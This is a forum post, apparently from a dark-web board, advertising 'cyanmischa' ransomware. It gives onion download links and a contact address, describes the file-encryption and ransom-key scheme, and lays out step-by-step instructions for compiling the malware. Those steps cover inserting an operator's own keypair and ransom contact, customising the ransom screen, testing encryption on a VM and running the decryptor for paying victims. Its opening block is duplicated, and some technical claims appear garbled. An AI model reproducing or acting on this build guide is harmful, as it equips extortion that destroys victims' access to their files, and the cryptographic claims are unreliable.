- Joined
- July 11, 2025
- Messages
- 1
- Reaction score
- 0
- Points
- 1
- Thread Author
- #1
http://kqdrhdqaqeqc3txz7uekmesz3ny6rut477657gf2y5tnwkya7nv65pid.onion/files/1782a766066d/
http://aduiuw4moiy5yv5ukq7lm6usjj5n...reads/how-to-compile-cyanmischa-ransomware.8/
cyanmischa@proton.me
cyanmischa ransomware encrypts files with salsa40, which uses 64-bit shifts, it is cryptographically secure and hardware accelerated by MMX instructions
cyanmischa works on Windows NT 3.5 and up
cyanmischa assigns random 5 letter extension with unique filename that fits within path length limit, and within encrypted files it stores 16 byte header, 8 byte original file size, 8 bytes each of original date created/accessed/modified, 32 byte salsa40 nonce, 48 bytes of verification (must be all 0x37 bytes when decrypting), salsa40 encrypted file contents, and original file name
cyanmischa stores its information in a perfc file and in perfc registry
cyanmischa uses Reed-Solomon error correction codes in its personal decryption code and final decryption key, allowing user to misspell a few characters
cyanmischa generates its personal decryption code by generating secp192k1 victim keypair, forming 192-bit shared secret from ransomware public key and victim private key, multiplying it with the golden ratio, and using 193-bit compressed victim public key and 36 high bits of shared secret to form 229-bit key which is then converted to 40 digits in base53 and expanded to 52 digits by Reed-Solomon ECC (user can misspell up to 6 characters); the remaining 156 bits of shared secret are in the final decryption key which is converted to 30 digits in base37 and expanded to 36 digits by Reed-Solomon ECC (user can misspell up to 3 characters)
To compile cyanmischa:
To inject your own secp192k1 keypair and compile cyanmischa_key:
http://aduiuw4moiy5yv5ukq7lm6usjj5n...reads/how-to-compile-cyanmischa-ransomware.8/
cyanmischa@proton.me
cyanmischa ransomware encrypts files with salsa40, which uses 64-bit shifts, it is cryptographically secure and hardware accelerated by MMX instructions
cyanmischa works on Windows NT 3.5 and up
cyanmischa assigns random 5 letter extension with unique filename that fits within path length limit, and within encrypted files it stores 16 byte header, 8 byte original file size, 8 bytes each of original date created/accessed/modified, 32 byte salsa40 nonce, 48 bytes of verification (must be all 0x37 bytes when decrypting), salsa40 encrypted file contents, and original file name
cyanmischa stores its information in a perfc file and in perfc registry
cyanmischa uses Reed-Solomon error correction codes in its personal decryption code and final decryption key, allowing user to misspell a few characters
cyanmischa generates its personal decryption code by generating secp192k1 victim keypair, forming 192-bit shared secret from ransomware public key and victim private key, multiplying it with the golden ratio, and using 193-bit compressed victim public key and 36 high bits of shared secret to form 229-bit key which is then converted to 40 digits in base53 and expanded to 52 digits by Reed-Solomon ECC (user can misspell up to 6 characters); the remaining 156 bits of shared secret are in the final decryption key which is converted to 30 digits in base37 and expanded to 36 digits by Reed-Solomon ECC (user can misspell up to 3 characters)
To compile cyanmischa:
- Download Digital Mars C++ 8.57 (dm857c.zip) and STLport 4.5.3 (stlport.zip) from Digital Mars Download C and C++ Compilers
- Extract dm857c.zip and stlport.zip, merge into a single dm folder
- Edit dm\bin\sc.ini file, replace the line
- with
-
- (optional: add dm\bin into environmental variables)
- Extract cyanmischasource.zip
- Compile with the command dm\bin\dmc cyanmischa -o -L/exet:nt/su:windows:4.0/la
- If done successfully, cyanmischa.exe will appear.
To inject your own secp192k1 keypair and compile cyanmischa_key:
- Replace bytes of secp192k1 public key in ransomwarepublickey in cyanmischa.cpp
- Insert bytes of secp192k1 private key into ransomwareprivatekey in cyanmischa_key.cpp (the private key must match the public key you entered)
- Replace the value ransomcontact with your own contact method (whenever someone contacts you with it, you must run cyanmischa_key on the personal decryption code they sent you)
- Replace the values of header, ransomcolor, ransomperfcregistry, ransomperfcfile, cryptheader (16 bytes), ransomtitle, ransomprefix, ransomsuffix, ransomvictim, ransominstructions1, ransominstructions2, ransomdecryptiontitle, ransomdecryption1, ransomdecryption2, ransomdecryption3, ransomdecryption4, ransomdecryptedtitle, and petyaskull (ransomprefix, ransomsuffix must match between cyanmischa.cpp and cyanmischa_key.cpp)
- (optional: replace set of base53 and base37 characters in ecc.cpp with your own set, which must have the respective amount of unique, sorted ASCII characters)
- (optional: rename cyanmischa.cpp and cyanmischa_key.cpp)
- Recompile with the command dm\bin\dmc cyanmischa -o -L/exet:nt/su:windows:4.0/la
- If done successfully, cyanmischa.exe will appear.
- Compile cyanmischa_key with the command dm\bin\dmc cyanmischa_key -o
- If done successfully, cyanmischa_key.exe will appear.
- Test cyanmischa.exe in Windows VM, if done correctly, files will get encrypted, and once encryption finishes, victim screen will show up.
- Test cyanmischa_key.exe, if ransomprefix has some of the characters in base53 set, skip the prefix when entering key in cyanmischa_key.
- If done successfully, the key will be correct and will result in files being decrypted.
